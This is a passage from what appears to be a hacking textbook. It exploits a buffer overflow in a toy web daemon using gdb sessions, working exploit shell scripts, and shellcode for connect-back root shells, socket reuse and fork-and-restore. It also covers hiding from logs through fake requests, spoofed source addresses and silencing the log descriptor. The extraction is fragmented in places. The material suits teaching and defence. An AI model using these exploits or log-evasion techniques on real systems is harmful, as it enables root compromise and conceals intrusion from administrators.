reader@hacking:~/booksrc $ sudo gdb -q—pid=25830 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 25830
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:68

(gdb) list 68
63 if (listen(sockfd, 20) == -1)
64 fatal("listening on socket");
65
66 while(1) { // Accept loop
67 sin_size = sizeof(struct sockaddr_in);
68 new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
69 if(new_sockfd == -1)
70 fatal("accepting connection");
71
72 handle_connection(new_sockfd, &client_addr, logfd);
(gdb) list handle_connection
77 /* This function handles the connection on the passed socket from the
78 * passed client address and logs to the passed FD
...
Finally, the passed socket is closed at the end of the function
...
c, line 86
...

The execution pauses while the tinyweb daemon waits for a connection
...

Breakpoint 1, handle_connection (sockfd=5, client_addr_ptr=0xbffff810) at tinywebd
...
c:86
#1 0x08048fb7 in main () at tinywebd
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 25830
reader@hacking:~/booksrc $

The debugger shows that the request buffer starts at 0xbffff5c0 and the stored
return address is at 0xbffff7dc, which means the offset is 540 bytes
...
In the
output below, an exploit buffer is created that sandwiches the shellcode between
a NOP sled and the return address repeated 32 times
...
There are also unsafe bytes near the beginning of the exploit buffer,
which will be overwritten during null termination
...
This leaves a safe landing zone
for the execution pointer, with the shellcode at 0xbffff624
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e
'print "\
x24\xf6\xff\xbf"x32
...
0
...
1 80
localhost [127
...
0
...
With the loopback shellcode at 83 bytes and the
overwritten return address repeated 32 times, simple arithmetic shows that the
NOP sled needs to be 333 bytes to align everything in the exploit buffer properly
...
This listens for the connection back from
the shellcode and can be resumed later with the command fg (foreground)
...
When the
exploit buffer is piped into netcat, the -w option is used to tell it to time out after
one second
...

All this works fine, but if a shellcode of different size is used, the NOP sled size
must be recalculated
...

The BASH shell allows for simple control structures
...
Shell variables are used for the offset and overwrite return address, so
they can be easily changed for a different target
...

xtool_tinywebd
...
\"\r\n\"";) | nc -w 1 -v $2 80

Notice that this script repeats the return address an additional thirty-third time,
but it uses 128 bytes (32 x 4) for calculating the sled size
...
Sometimes different compiler
options will move the return address around a little bit, so this makes the exploit
more reliable
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh portbinding_shellcode 127
...
0
...
0
...
1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
If you were the administrator of the server running the
tinyweb daemon, what would be the first signs that you were hacked?

Log Files
One of the two most obvious signs of intrusion is the log file
...
Even though the attacker's exploits were successful, the log file keeps a
painfully obvious record that something is up
...
log
07/25/2007 14:55:45> Starting up
...
0
...
1:38127 "HEAD / HTTP/1
...
0
...
1:50201 "GET / HTTP/1
...
0
...
1:50202 "GET /image
...
1" 200 OK
07/25/2007 17:49:14> From 127
...
0
...
ico HTTP/1
...

08/01/2007 15:43:08> Starting up
...
0
...
1:45396 "␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣jfX␣1␣CRj j ␣␣ ␣jfXCh ␣␣
f␣T$ fhzifS␣␣j OV␣␣C ␣␣␣␣I␣? Iy␣␣
Rh//shh/bin␣␣R␣␣S␣␣ $␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣" NOT HTTP!
reader@hacking:~/booksrc $

Of course in this case, after the attacker gains a root shell, he can just edit the log
file since it's on the same system
...
In extreme cases, logs are sent to a printer
for hard copy, so there is a physical record
...

Blend In with the Crowd
Even though the log files themselves cannot be changed, occasionally what gets
logged can be
...
The tinyweb daemon program can be tricked
into logging a valid-looking entry for an exploit attempt
...
The idea is to
make the log entry look like a valid web request, like the following:
07/22/2007 17:57:00> From 127
...
0
...
0" 200 OK
07/25/2007 14:49:14> From 127
...
0
...
1" 200 OK
07/25/2007 14:49:14> From 127
...
0
...
jpg HTTP/1
...
0
...
1:50203 "GET /favicon
...
1" 404 Not Found

This type of camouflage is very effective at large enterprises with extensive log

files, since there are so many valid requests to hide among: It's easier to blend in
at a crowded mall than an empty street
...
The recv_line() function uses \r\n as the delimiter;
however, all the other standard string functions use a null byte for the delimiter
...

The following exploit script puts a valid-looking request in front of the rest of the
exploit buffer
...

xtool_tinywebd_stealth
...
1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))
echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode
($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\"
...
\"\r\n\"") | nc -w 1 -v $2 80

This new exploit buffer uses the null byte delimiter to terminate the fake request
camouflage
...
Since the string functions used to write to the
log use a null byte for termination, the fake request is logged and the rest of the
exploit is hidden
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $
...
sh loopback_shell 127
...
0
...
0
...
1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

The connection used by this exploit creates the following log file entries on the
server machine
...

08/02/2007 13:37:44> From 127
...
0
...
1" 200 OK

Even though the logged IP address cannot be changed using this method, the
request itself appears valid, so it won't attract too much attention
...
However, when testing, this is something that is easily overlooked
...
When the tinyweb daemon is exploited, the
process is tricked into providing a remote root shell, but it no longer processes
web requests
...

A skilled hacker can not only crack open a program to exploit it, he can also put
the program back together again and keep it running
...

One Step at a Time
Complex exploits are difficult because so many different things can go wrong, with
no indication of the root cause
...
The end goal is a piece of shellcode that will spawn a shell yet keep
the tinyweb server running
...
For now, the first step should be
figuring out how to put the tinyweb daemon back together after exploiting it
...

Since the tinyweb daemon redirects standard out to /dev/null, writing to standard
out isn't a reliable marker for shellcode
...
This can be done by making a call to open(), and then
close()
...

We could look through the include files to figure out what O_CREAT and all the
other necessary defines actually are and do all the bitwise math for the
arguments, but that's sort of a pain in the ass
...
The strace program can be used on any program to show
every system call it makes
...

reader@hacking:~/booksrc $ strace
...
/notetaker", ["
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 70799, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd3000
close(3) = 0

access("/etc/ld
...
nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0`\1\000"
...
}) = 0
mmap2(NULL, 1312164, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e92000
mmap2(0xb7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
0x13b) =
0xb7fcd000
mmap2(0xb7fd0000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0)
=
0xb7fd0000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e91000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e916c0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fcd000, 4096, PROT_READ) = 0
munmap(0xb7fd3000, 70799) = 0
brk(0) = 0x804a000
brk(0x806b000) = 0x806b000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
, 37[DEBUG] buffer @ 0x804a008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804a070: \'/"
...
}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe3000
_llseek(3, 0, 0xbffff4e4, SEEK_CUR) = -1 ESPIPE (Illegal seek)
write(3, "[!!] Fatal Error in main() while"
...
c
fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
fatal("in main() while opening file");
reader@hacking:~/booksrc $

When run through strace, the notetaker binary's suid-bit isn't used, so it doesn't
have permission to open the data file
...
Since they match, we can safely use the values passed to the
open() function in the notetaker binary as the arguments for the open() system
call in our shellcode
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) set dis intel
(gdb) disass main

Dump of assembler code for function main:
0x0804875f : push ebp
0x08048760 : mov ebp,esp
0x08048762 : sub esp,0x28
0x08048765 : and esp,0xfffffff0
0x08048768 : mov eax,0x0
0x0804876d : sub esp,eax
0x0804876f : mov DWORD PTR [esp],0x64
0x08048776 : call 0x8048601
0x0804877b : mov DWORD PTR [ebp-12],eax
0x0804877e : mov DWORD PTR [esp],0x14
0x08048785 : call 0x8048601
0x0804878a : mov DWORD PTR [ebp-16],eax
0x0804878d : mov DWORD PTR [esp+4],0x8048a9f
0x08048795 : mov eax,DWORD PTR [ebp-16]
0x08048798 : mov DWORD PTR [esp],eax
0x0804879b : call 0x8048480
0x080487a0 : cmp DWORD PTR [ebp+8],0x1
0x080487a4 : jg 0x80487ba
0x080487a6 : mov eax,DWORD PTR [ebp-16]
0x080487a9 : mov DWORD PTR [esp+4],eax
0x080487ad : mov eax,DWORD PTR [ebp+12]
0x080487b0 : mov eax,DWORD PTR [eax]
0x080487b2 : mov DWORD PTR [esp],eax
0x080487b5 : call 0x8048733
0x080487ba : mov eax,DWORD PTR [ebp+12]
0x080487bd : add eax,0x4
0x080487c0 : mov eax,DWORD PTR [eax]
0x080487c2 : mov DWORD PTR [esp+4],eax
0x080487c6 : mov eax,DWORD PTR [ebp-12]
0x080487c9 : mov DWORD PTR [esp],eax
0x080487cc : call 0x8048480
0x080487d1 : mov eax,DWORD PTR [ebp-12]
0x080487d4 : mov DWORD PTR [esp+8],eax
0x080487d8 : mov eax,DWORD PTR [ebp-12]
0x080487db : mov DWORD PTR [esp+4],eax
0x080487df : mov DWORD PTR [esp],0x8048aaa
0x080487e6 : call 0x8048490
0x080487eb : mov eax,DWORD PTR [ebp-16]
0x080487ee : mov DWORD PTR [esp+8],eax
0x080487f2 : mov eax,DWORD PTR [ebp-16]
0x080487f5 : mov DWORD PTR [esp+4],eax
0x080487f9 : mov DWORD PTR [esp],0x8048ac7
0x08048800 : call 0x8048490
0x08048805 : mov DWORD PTR [esp+8],0x180
0x0804880d : mov DWORD PTR [esp+4],0x441
0x08048815 : mov eax,DWORD PTR [ebp-16]
0x08048818 : mov DWORD PTR [esp],eax
0x0804881b : call 0x8048410

---Type to continue, or q to quit---q
Quit
(gdb)

Remember that the arguments to a function call will be pushed to the stack in
reverse
...
The first argument is a pointer tothe
name of the file in EAX, the second argument (put at [esp+4]) is 0x441, and the
third argument (put at [esp+8]) is 0x180
...
The following shellcode uses these values to create a file called Hacked in
the root filesystem
...
s
BITS 32
; Mark the filesystem to prove you ran
...

; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg
push BYTE 0x6 ; Close ()
pop eax
int 0x80 ; Close file
...

int 0x80 ; Exit(0), to avoid an infinite loop
...
Finally,
it calls exit to avoid an infinite loop
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ nasm mark
...
#[1
...
j
...
A
...
f
...
X
...
|
00000020 89 c3 40 cd 80 e8 d8 ff ff ff 2f 48 61 63 6b 65 |
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127
...
0
...
The disassembly of main() in the output
below shows that we can safely return to the addresses 0x08048f64,0x08048f65,
or 0x08048fb7 to get back into the connection accept loop
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
:[ output trimmed ]:
...

(gdb)

All three of these addresses basically go to the same place
...

However, there are other things we need to fix first
...
These are the instructions that set up and

remove the stack frame structures on the stack
...
:[ output trimmed ]:
...

(gdb)

At the beginning of the function, the function prologue saves the current values of
the EBP and EBX registers by pushing them to the stack, and sets EBP to the
current value of ESP so it can be used as a point of reference for accessing stack
variables
...
The function epilogue at the end restores ESP by adding
0x644 back to it and restores the saved values of EBX and EBP by popping them
from the stack back into the registers
...
The return address that we
overwrite is pushed to the stack when handle_connection() is called, so the
saved values for EBP and EBX pushed to the stack in the function prologue will be
between the return address and the corruptible buffer
...
Since we don't gain
control of the program's execution until the return instruction, all the instructions
between the overwrite and the return instruction must be executed
...
The assembly instruction int3 creates the byte 0xcc, which is
literally a debugging breakpoint
...
This breakpoint will be caught by GDB, allowing us to examine
the exact state of the program after the shellcode executes
...
s
BITS 32
; Mark the filesystem to prove you ran
...

; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg0
push BYTE 0x6 ; Close ()
pop eax
int 0x80 ; Close file
...
In the
output below, a breakpoint is set right before handle_connection() is called
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 23497 0
...
0 1636 356 ? Ss 17:08 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q -pid=23497 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 23497
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c, line 72
...

In the output above, a breakpoint is set right before handle_connection() is

called (shown in bold)
...
This will advance execution to the breakpoint in
the other terminal
...
s
reader@hacking:~/booksrc $
...
sh mark_break 127
...
0
...
0
...
1
shellcode: mark_break (44 bytes)
[NOP (372 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
localhost [127
...
0
...
Some
important stack registers are displayed, which show the stack setup before (and
after) the handle_connection() call
...
Then these stack
registers are checked again to view their state at the moment the shellcode
begins to execute
...
c:72
72 handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp 0xbffff7e0 0xbffff7e0
ebx 0xb7fd5ff4 -1208131596
ebp 0xbffff848 0xbffff848
(gdb) cont
Continuing
...

0xbffff753 in ?? ()
(gdb) i r esp ebx ebp
esp 0xbffff7e0 0xbffff7e0
ebx 0x6 6
ebp 0xbffff624 0xbffff624
(gdb)

This output shows that EBX and EBP are changed at the point the shellcode
begins execution
...
The compiler probably saved this
register to the stack due to some rule about calling convention, even though it
isn't really used
...
Because the original saved value of EBP was overwritten
by our exploit, the original value must be recreated
...
Since computers are deterministic, the assembly
instructions will clearly explain how to do all this
...
Since ESP wasn't damaged by our exploit, we can restore
the value for EBP by adding 0x68 to ESP at the end of our shellcode
...
The proper return address for the
handle_connection() call is the instruction found after the call at 0x08048fb7
...

mark_restore
...

jmp short one
two:
pop ebx ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5 ; Open()
pop eax
mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR
int 0x80 ; Open file to create it
...

push 0x08048fb7 ; Return address
...
The tinyweb daemon doesn't
even know that something happened
...
s
reader@hacking:~/booksrc $ hexdump -C mark_restore
00000000 eb 26 5b 31 c9 88 4b 07 6a 05 58 66 b9 41 04 31 |
...
K
...
Xf
...
1|
00000010 d2 66 ba 80 01 cd 80 89 c3 6a 06 58 cd 80 8d 6c |
...
j
...
l|
00000020 24 68 68 b7 8f 04 08 c3 e8 d5 ff ff ff 2f 48 61 |$hh
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127
...
0
...
0 0
...
/tinywebd
reader 26828 0
...
0 2880 748 pts/1 R+ 20:38 0:00 grep tinywebd
reader@hacking:~/booksrc $
...
0
...
1
The web server for 127
...
0
...
Since the shell is interactive, but we still want the process to
handle web requests, we need to fork to a child process
...
We want our
shellcode to fork and the child process to serve up the root shell, while the parent
process restores tinywebd's execution
...
s
...
The next few instructions
test to see if EAX is zero
...
Otherwise, we're in the parent process, so the shellcode restores execution
into tinywebd
...
s
BITS 32
push BYTE 0x02 ; Fork is syscall #2
pop eax
int 0x80 ; After the fork, in child process eax == 0
...

; In the parent process, restore tinywebd
...

push 0x08048fb7 ; Return address
...

xor ebx, ebx ; ebx is the type of socketcall
...

...
s
...
Multiple jobs are used instead of
multiple terminals, so the netcat listener is sent to the background by ending the
command with an ampersand (&)
...
The process is then suspended by
hitting CTRL-Z, which returns to the BASH shell
...

reader@hacking:~/booksrc $ nasm loopback_shell_restore
...
X
...
l$hh
...
jfX
...
CRj
...
|
00000020 e1 cd 80 96 6a 66 58 43 68 7f bb bb 01 66 89 54 |
...
f
...
fhzifS
...
QV
...
I
...
|
00000050 0b 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 |
...
R
...
S
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (299 b)] [shellcode (102 b)] [ret addr (128 b)]
localhost [127
...
0
...
/webserver_id 127
...
0
...
0
...
1 is Tiny webserver
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

With this shellcode, the connect-back root shell is maintained by a separate child
process, while the parent process continues to serve web content
...
This type of camouflage will
make the attacks harder to find, but they are not invisible
...

Since we're mucking around with the insides of the tinyweb daemon now, we
should be able to hide our presence even better
...

Code Segment from tinywebd
...

The best way to generate a sockaddr_in structure for injection is to write a little
C program that creates and dumps the structure
...

addr_struct
...
h>
#include ...
h>
#include ...
sin_family = AF_INET;
addr
...
sin_addr
...
The output below
shows the program being compiled and executed
...
c
reader@hacking:~/booksrc $
...
34
...
78 9090
##
"8N_reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
34
...
78 9090 | hexdump -C
00000000 02 00 23 82 0c 22 38 4e 00 00 00 00 f4 5f fd b7 |
...
_
...
Since the fake request is 15 bytes long and we
know the buffer starts at 0xbffff5c0, the fake address will be injected at
0xbfffff5cf
...
sh
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
reader@hacking:~/booksrc $ gdb -q -batch -ex "p /x 0xbffff5c0 + 15"
$1 = 0xbffff5cf
reader@hacking:~/booksrc $

Since the client_addr_ptr is passed as a second function argument, it will be on
the stack two dwords after the return address
...

xtool_tinywebd_spoof
...
34
...
78"
SPOOFPORT="9090"
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 "
exit
fi
FAKEREQUEST="GET / HTTP/1
...
/addr_struct "$SPOOF IP" "$SPOOFPORT";
perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;

perl -e "print \"$RETADDR\"x32
...
\"\r\n\"") | nc -w 1 -v $2 80

The best way to explain exactly what this exploit script does is to watch tinywebd
from within GDB
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 27264 0
...
0 1636 420 ? Ss 20:47 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q—pid=27264 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 27264
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
The connection is
79 * processed as a web request, and this function replies over the connected
80 * socket
...

81 */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
{
83 unsigned char *ptr, request[500], resource[500], log_buffer[500];
84 int fd, length;
85
86 length = recv_line(sockfd, request);
(gdb)
87
88 sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr>sin_addr),
ntohs(client_addr_ptr->sin_port), request);
89
90 ptr = strstr(request, " HTTP/"); // Search for valid looking request
...

95 ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...
c, line 86
...
c, line 89
...

Then, from another terminal, the new spoofing exploit is used to advance
execution in the debugger
...
/xtool_tinywebd_spoof
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128]

[*fake_addr 8]
localhost [127
...
0
...

Breakpoint 1, handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd
...
c:86
#1 0x08048fb7 in main () at tinywebd
...

Breakpoint 2, handle_connection (sockfd=-1073744433, client_addr_ptr=0xbffff5cf,
logfd=2560)
at tinywebd
...

(gdb) x/24x request + 500
0xbffff7b4: 0xbffff624 0xbffff624 0xbffff624 0xbffff624
0xbffff7c4: 0xbffff624 0xbffff624 0xbffff624 0xbffff624
0xbffff7d4: 0xbffff624 0xbffff624 0xbffff624 0xbffff5cf
0xbffff7e4: 0xbffff5cf 0x00000a00 0xbffff838 0x00000004
0xbffff7f4: 0x00000000 0x00000000 0x08048a30 0x00000000
0xbffff804: 0x0804a8c0 0xbffff818 0x00000010 0x3bb40002
(gdb) print client_addr_ptr
$3 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print client_addr_ptr
$4 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print *client_addr_ptr
$5 = {sin_family = 2, sin_port = 33315, sin_addr = {s_addr = 1312301580},
sin_zero = "\000\000\000\000_
(gdb) x/s log_buffer
0xbffff1c0: "From 12
...
56
...
1\"\t"
(gdb)

At the first breakpoint, client_addr_ptr is shown to be at 0xbffff7e4 and
pointing to 0xbffff810
...
The second breakpoint is after the overwrite, so the
client_addr_ptr at 0xbffff7e4 is shown to be overwritten with the address of
the injected sockaddr_in structure at 0xbffff5cf
...

Logless Exploitation
Ideally, we want to leave no trace at all
...
However, let's assume
this program is part of a secure infrastructure where the log files are mirrored to
a secure logging server that has minimal access or maybe even a line printer
...
The timestamp()
function in the tinyweb daemon tries to be secure by writing directly to an open
file descriptor
...
This would be a fairly effective countermeasure;
however, it was implemented poorly
...

Even though logfd is a global variable, it is also passed to
handle_connection()as a function argument
...
Since this argument is found right after the client_addr_ptr
on the stack, it gets partially overwritten by the null terminator and the extra
0x0a byte found at the end of the exploit buffer
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 27264
reader@hacking:~/booksrc $ sudo kill 27264
reader@hacking:~/booksrc $

As long as the log file descriptor doesn't happen to be 2560 (0x0a00 in
hexadecimal), every time handle_connection() tries to write to the log it will fail
...
In the output below, strace is
used with the -p command-line argument to attach to a running process
...
Once again, the
spoofing exploit tool is used in another terminal to connect and advance
execution
...
/tinywebd
Starting tiny web daemon
...
0 0
...
/tinywebd
reader 525 0
...
0 2880 748 pts/1 R+ 23:24 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)

write(2560, "From 12
...
56
...
, 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $

This output clearly shows the attempts to write to the log file failing
...
Carelessly mangling this pointer will usually lead to a crash
...
Since
the tinyweb daemon redirects standard out to /dev/null, the next exploit script will
overwrite the passed logfd variable with 1, for standard output
...

xtool_tinywebd_silent
...
34
...
78"
SPOOFPORT="9090"
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 "
exit
fi
FAKEREQUEST="GET / HTTP/1
...
/addr_struct "$SPOOFIP" "$SPOOFPORT";
perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
\"\x01\x00\x00\x00\r\n\"") | nc -w 1
-v $2
80

When this script is used, the exploit is totally silent and nothing is written to the
log file
...
/tinywebd
Starting tiny web daemon
...
log

-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd
...
/xtool_tinywebd_silent
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127
...
0
...
log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd
...
Using this technique,
we can exploit tinywebd without leaving any trace in the log files
...
This is shown by
strace in the output below, when the silent exploit tool is run in another terminal
...
0 0
...
/tinywebd
reader 1005 0
...
0 2880 748 pts/1 R+ 23:36 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(1, "09/19/2007 23:36:31> ", 21) = 21
write(1, "From 12
...
56
...
, 47) = 47
Process 478 detached
reader@hacking:~/booksrc $

The Whole Infrastructure
As always, details can be hidden in the bigger picture
...
Countermeasures such as intrusion detection
systems (IDS) and intrusion prevention systems (IPS) can detect abnormal
network traffic
...
In particular, the connection to
port 31337 used in our connect-back shellcode is a big red flag
...
A highly
secure infrastructure might even have the firewall setup with egress filters to
prevent outbound connections
...

Socket Reuse
In our case, there's really no need to open a new connection, since we already
have an open socket from the web request
...
This prevents additional TCP connections from being logged and
allows exploitation in cases where the target host cannot open outbound
connections
...
c shown below
...
c
while(1) { // Accept loop
sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr, logfd);
}
return 0;
}
/* This function handles the connection on the passed socket from the
* passed client address and logs to the passed FD
...
Finally, the passed socket is closed at the end of the function
...
This overwrite happens before we gain

control of the program in the shellcode, so there's no way to recover the previous
value of sockfd
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 478 0
...
0 1636 420 ? Ss 23:24 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q-pid=478 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 478
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
The connection is
79 * processed as a web request, and this function replies over the connected
80 * socket
...

81 */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
{
83 unsigned char *ptr, request[500], resource[500], log_buffer[500];
84 int fd, length;
85
86 length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd
...

(gdb) cont
Continuing
...

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd
...

(gdb) bt
#0 handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at tinywebd
...
c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff83c: 0x0000000d
(gdb) quit
The program is running
...
Using this, we can create shellcode that uses the socket file
descriptor stored here instead of creating a new connection
...
If this happens and the shellcode is using a hardcoded stack address, the exploit will fail
...
If we use an address
relative to ESP, then even if the stack shifts around a bit, the address of
new_sockfd will still be correct since the offset from ESP will be the same
...
Using this value for ESP, the offset is shown to be 0x5c bytes
...

socket_reuse_restore
...

test eax, eax
jz child_process ; In child process spawns a shell
...

lea ebp, [esp+0x68] ; Restore EBP
...

ret ; Return
...

lea edx, [esp+0x5c] ; Put the address of new_sockfd in edx
...

push BYTE 0x02
pop ecx ; ecx starts at 2
...

jns dup_loop ; If the sign flag is not set, ecx is not negative
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
This second
exploit script adds an additional cat - command to the end of the exploit buffer
...
Running cat on standard input is
